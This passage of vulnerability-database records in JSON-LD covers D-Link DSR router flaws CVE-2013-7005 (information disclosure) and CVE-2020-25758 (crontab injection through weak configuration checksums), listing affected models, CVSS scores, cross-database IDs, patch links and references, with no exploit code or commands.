      {
        "db": "VULHUB",
        "id": "VHN-67007"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-7005",
        "trust": 3.4
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30061",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "64461",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "id": "VAR-201312-0290",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:08:28.211000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Services Routers",
        "trust": 0.8,
        "url": "http://www.dlink.com/us/en/business-solutions/security/services-routers"
      },
      {
        "title": "\u30eb\u30fc\u30bf\uff0f\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb",
        "trust": 0.8,
        "url": "http://www.dlink-jp.com/router-firewall"
      },
      {
        "title": "Downloads",
        "trust": 0.8,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "title": "D-Link DSR Router Series account credentials have multiple patches for information disclosure vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/41954"
      },
      {
        "title": "DSR-250N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47082"
      },
      {
        "title": "DSR-250_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47081"
      },
      {
        "title": "DSR-150N_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47080"
      },
      {
        "title": "DSR-150_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47079"
      },
      {
        "title": "DSR-150_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47078"
      },
      {
        "title": "DSR-1000_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47085"
      },
      {
        "title": "DSR-500N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47084"
      },
      {
        "title": "DSR-500_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47083"
      },
      {
        "title": "DSR-1000N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47086"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/30061"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7005"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7005"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/64461"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/us/en/business-solutions/security/services-routers/dsr-500n-wireless-n-unified-services-router"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-12-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "BID",
        "id": "64461"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "date": "2013-12-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      },
      {
        "date": "2013-12-19T04:24:57.493000",
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-12-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15507"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67007"
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "BID",
        "id": "64461"
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      },
      {
        "date": "2024-11-21T02:00:08.787000",
        "db": "NVD",
        "id": "CVE-2013-7005"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "64461"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Vulnerability in the firmware of multiple D-Link router products that allows important information to be obtained",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005616"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-401"
      }
    ],
    "trust": 0.6
  }
}

var-202012-0332
Vulnerability from variot

An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root. The D-Link DSR-250 device contains a vulnerability related to inadequate data integrity verification. Information may be obtained or tampered with, and the device may be put into a denial-of-service (DoS) state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering.

D-Link DSR-250 3.17 has a command injection vulnerability. The vulnerability stems from insufficient verification of the configuration file checksum.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202012-0332",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "*"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "3.17"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "cve": "CVE-2020-25758",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CVE-2020-25758",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CNVD-2020-72722",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "id": "CVE-2020-25758",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-25758",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-25758",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2020-25758",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-72722",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-1106",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root. The D-Link DSR-250 device contains a vulnerability related to inadequate data integrity verification. Information may be obtained or tampered with, and the device may be put into a denial-of-service (DoS) state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering. \n\r\n\r\nD-Link DSR-250 3.17 has a command injection vulnerability. The vulnerability stems from insufficient verification of the configuration file checksum.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-25758",
        "trust": 3.0
      },
      {
        "db": "DLINK",
        "id": "SAP10195",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "id": "VAR-202012-0332",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      }
    ]
  },
  "last_update_date": "2024-11-23T22:11:14.704000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Unauthenticated\u00a0\u0026\u00a0Authenticated\u00a0Command\u00a0Injection\u00a0Vulnerabilities",
        "trust": 0.8,
        "url": "https://www.dlink.com/en/security-bulletin"
      },
      {
        "title": "Patch for D-Link DSR-250 command injection vulnerability (CNVD-2020-72722)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/242236"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-354",
        "trust": 1.0
      },
      {
        "problemtype": "Insufficient data integrity verification (CWE-354) [NVD Evaluation]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25758"
      },
      {
        "trust": 1.6,
        "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10195"
      },
      {
        "trust": 1.6,
        "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
      },
      {
        "trust": 1.6,
        "url": "https://www.dlink.com/en/security-bulletin"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "date": "2021-08-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "date": "2020-12-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      },
      {
        "date": "2020-12-15T20:15:16.243000",
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "date": "2021-08-27T07:49:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "date": "2020-12-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      },
      {
        "date": "2024-11-21T05:18:41.153000",
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link\u00a0DSR-250 Vulnerability related to inadequate data integrity verification on devices",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1106"
      }
    ],
    "trust": 0.6
  }
}